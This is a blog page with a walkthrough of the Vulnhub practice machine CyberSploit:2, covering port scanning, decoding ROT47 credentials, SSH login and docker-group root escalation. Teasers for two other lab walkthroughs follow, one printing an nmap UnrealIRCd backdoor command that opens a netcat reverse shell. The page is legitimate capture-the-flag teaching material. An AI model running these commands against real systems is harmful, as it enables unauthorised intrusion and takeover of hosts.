CyberSploit:2 - Walkthrough [Vulnhub]

Here's my solution for CyberSploit:2.
The Machine can be downloaded from here

Nmap
Starting with nmap scanning for all TCP open ports.
nmap -sC -sV -p- 192.168.1.103


We find only 2 open ports.

Enumeration
Browsing the website, show list of usernames and passwords.


Checking the source code reveal us a hint- ROT47.



While browsing the website, we see a strange username- D92:=6?5C2 and its associated
password as- 4J36CDA=@:E`

From the hint we can guess that the username and password can be ROT47 encoded.

Browsed Decode.fr to decode it, and we get the credentials as-
username: shailendra
password: cybersploit1


Getting Access
Tried ssh with credential, and we get the access.
ssh shailendra@192.168.1.1
password: cybersploit1

Found a file named as hint.txt, which gives a hint as docker, it can be used for privilege escalation,
also the user is a member of docker group.


Privilege Escalation
docker run -v /:/mnt --rm -it alpine chroot /mnt sh


And we get the flag


Comments

Post a Comment

Popular posts from this blog

Sunset:Noontide - Walkthrough [Vulnhub]

Image
Here's my solution for Sunset:Noontide. The machine can be downloaded from here. Nmap Scanning for all TCP ports. $ nmap -sC -sV -p- 192.168.1.109 We find 3 ports (UnrealIRCd) open. Enumeration We search the exploit for UnrealIRCd and we find it here.     Getting Access To exploit we simply run the nmap command with the reverse shell payload and on the other hand we start the netcat listener. $ nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='nc -e /bin/sh 192.168.1.108 1234' 192.168.1.109 We get the reverse shell. User Flag. Privilege Escalation We find that user- root has the default password- root. Lets switch to user- root and get the root flag. $ su root Password: root  
Read more

KB-VULN: 2 - Walkthrough [Vulnhub]

Image
Here's my solution for KB-VULN:2. The machine can be downloaded from here. Nmap Scanning for all TCP ports. $ nmap -sC -sV -p- 192.168.1.108   We find 5 ports open. Enumeration From nmap's output we see ports 139 and 445 (SMB) are open, we enumerate smb shares. $ smbmap -H 192.168.1.108 We have access to share named as- Anonymous, so lets get the smb shell. $ smbclient //192.168.1.108/Anonymous and download the file- backup.zip. After unzipping, we get a file named as- remember_me.txt and a folder named as- wordpress. On viewing the contents of file- remember_me.txt, seems to be a credential. $ cat remember_.txt We keep this information, which can be used in further stage. Browsing the web, and checking the source did not reveal any hint. Using dirb to scan the directories. $ dirb http://192.168.1.108 -r Browsing /wordpress.   Checking the page source. We map the ip to host name- kb.vuln, by editing the /etc/hosts file. Browsing /wordpress/wp-login.php, here we enter the crede
Read more